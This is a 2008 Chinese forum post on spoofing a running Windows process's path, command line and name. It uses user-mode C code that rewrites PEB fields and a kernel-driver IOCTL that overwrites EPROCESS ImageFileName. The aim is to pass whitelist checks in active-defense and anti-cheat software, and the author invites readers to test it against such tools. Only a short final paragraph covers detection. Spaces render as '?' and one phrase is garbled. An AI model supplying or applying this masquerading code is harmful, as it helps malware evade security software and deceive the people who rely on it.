S.l.e!ep.￠%

標 題: 【原創】運行期修改可執行文件的路徑和Command Line
作 者: NetRoc
時 間: 2008-01-04,17:56
鏈 接: http://bbs.pediy.com/showthread.php?t=57682

??????目前的很多主動防御工具和反XX系統，在對特定進程進行保護的時候，出于兼容性的考慮，都會保留一些白名單。特別是一些系統進程，例如csrss.exe、svchost.exe等等。而針對這些系統進程，判斷是否在白名單中的方式，為了簡便起見經常采用取系統路徑、可執行文件名的方式。
????內核中比較明顯的能夠取到可執行文件路徑的方法有下面幾個：
1、??通過PEB.?ProcessParameters?->?ImagePathName取得可執行文件路徑，通過PEB.?ProcessParameters?->?CommandLine取得執行的命令行，以及PEB.?ProcessParameters里面其他幾個成員取得其他一些相關的路徑信息。
2、??通過nt!_EPROCESS的ImageFileName取得。
3、??通過nt!_EPROCESS::?SeAuditProcessCreationInfo::?ImageFileName取得。
4、??通過和_EPROCESS相關的文件對象信息取得。
????常見的方式一般只有1、2兩種。而上述的前三種方式都可以在運行時被修改掉，用來進行欺騙。特別是PEB里面的信息由于在ring3直接就可以訪問，實現上來說非常簡單。
????下面這段代碼通過NtQueryInformationProcess拿到PEB，然后修改路徑信息：
HMODULE?hMod?=?GetModuleHandle(?_T(?"ntdll.dll"));
??pfnNtQueryInformationProcess?p?=?(pfnNtQueryInformationProcess)::GetProcAddress(?hMod,?"NtQueryInformationProcess");
??
??PROCESS_BASIC_INFORMATION?stInfo?=?{0};
??DWORD?dwRetnLen?=?0;
??DWORD?dw?=?p(?GetCurrentProcess(),?ProcessBasicInformation,?&stInfo,?sizeof(stInfo),?&dwRetnLen);
??
??PPEB?pPeb?=?stInfo.PebBaseAddress;

??WCHAR?wszFullPath[MAX_PATH]?=?{0};
??WCHAR?wszTmp2[MAX_PATH]?=?{0};
??wcscpy(?wszFullPath,?wszPath);
??MultiByteToWideChar(?CP_THREAD_ACP,?0,?szName,?-1,?wszTmp2,?MAX_PATH);
??wcscat(?wszFullPath,?wszTmp2);
??
??wcscpy(?pPeb->ProcessParameters->ImagePathName.Buffer,?wszFullPath);
??pPeb->ProcessParameters->ImagePathName.Length?=?wcslen(?wszFullPath)?*?sizeof(WCHAR);
??
??int?nParamStart?=?0;
??WCHAR?*wszTmp?=?new?WCHAR[pPeb->ProcessParameters->CommandLine.MaximumLength];
??ZeroMemory(?wszTmp,?sizeof(WCHAR)?*?pPeb->ProcessParameters->CommandLine.MaximumLength);
??
??wcscpy(?wszTmp,?pPeb->ProcessParameters->CommandLine.Buffer);
??
??if?(?pPeb->ProcessParameters->CommandLine.Buffer[0]?==?'"')
??{
????for?(?int?i?=?1;?i?<?pPeb->ProcessParameters->CommandLine.Length?/?2;?i++)
????{
??????if?(?pPeb->ProcessParameters->CommandLine.Buffer[i]?==?'"')
??????{
????????nParamStart?=?i;
??????}
????}
??}
??
??if?(?nParamStart?!=?0)
??{
????if?(?pPeb->ProcessParameters->CommandLine.Buffer[0]?==?'"')
????{
??????pPeb->ProcessParameters->CommandLine.Buffer[0]?=?NULL;
??????wcscat(?pPeb->ProcessParameters->CommandLine.Buffer,?L"\"");
????}
????else
????{
??????pPeb->ProcessParameters->CommandLine.Buffer[0]?=?NULL;
????}
????wcscat(?pPeb->ProcessParameters->CommandLine.Buffer,?wszFullPath);
????wcscat(?pPeb->ProcessParameters->CommandLine.Buffer,?wszTmp?+?nParamStart);
??}
??delete[]?wszTmp;
????這個方式可以欺騙通過toolhelp函數枚舉出來的模塊路徑，以及直接讀取PEB獲取進程主模塊路徑的方式。
????另外，通過修改EPROCESS中的主模塊名信息，可以欺騙一些在驅動層的程序?；镜拇a如下：
????首先需要獲取EPROCESS里面ImageFileName的偏移。這個函數必須在DriverEntry里面調用。
ULONG?GetNameOffsetInEProcss()
{
??PEPROCESS?pProcess?=?NULL;
??ULONG?i?=?0;

??pProcess?=?PsGetCurrentProcess();
??for?(?i?=?0;?i?<?0x1000;?i++)
??{
????if?(?strncmp(?"System",?(PUCHAR)pProcess?+?i,?strlen("System"))?==?0)
????{
??????return?i;
????}
??}
??return?0;
}
????然后可以在IoCtrl里面修改當前進程的名字：
case?IOCTL_CHANGE_EXENAME:
??????szName?=?(char*)Irp->AssociatedIrp.SystemBuffer;
??????if?(?!szName)
??????{
????????ntStatus?=?STATUS_UNSUCCESSFUL;
????????break;
??????}
??????pEProcess?=?PsGetCurrentProcess();
??????strncpy(?(PCHAR)pEProcess?+?g_NameOffsetInEProcess,?szName,?16);
??????ntStatus?=?STATUS_SUCCESS;
??????break;
????由于只是示例，所以只實現了良種方式。修改SeAuditProcessCreationInfo里面的信息，考慮到兼容性問題，可能稍微復雜一點。不過也可以比較容易的實現。
????這種方式的偽裝可以穿過多少主動防御工具沒有試過，大家可以去看看，哈哈。
????至于對付的方式，可以通過上面說的第四種取進程路徑的方法。不過就比較復雜了，呵呵。
????流程就是，通過EPROCESS的SectionObject獲得文件的FilePointer，通過ObQueryNameString取得這個對象的名字。然后就可以取得主映像模塊的路徑了。詳細的代碼可以參考wrk中NtQueryInformationProcess的相關實現。
下面是實現的代碼:?
ImgPathChanger.rar[誰下載?]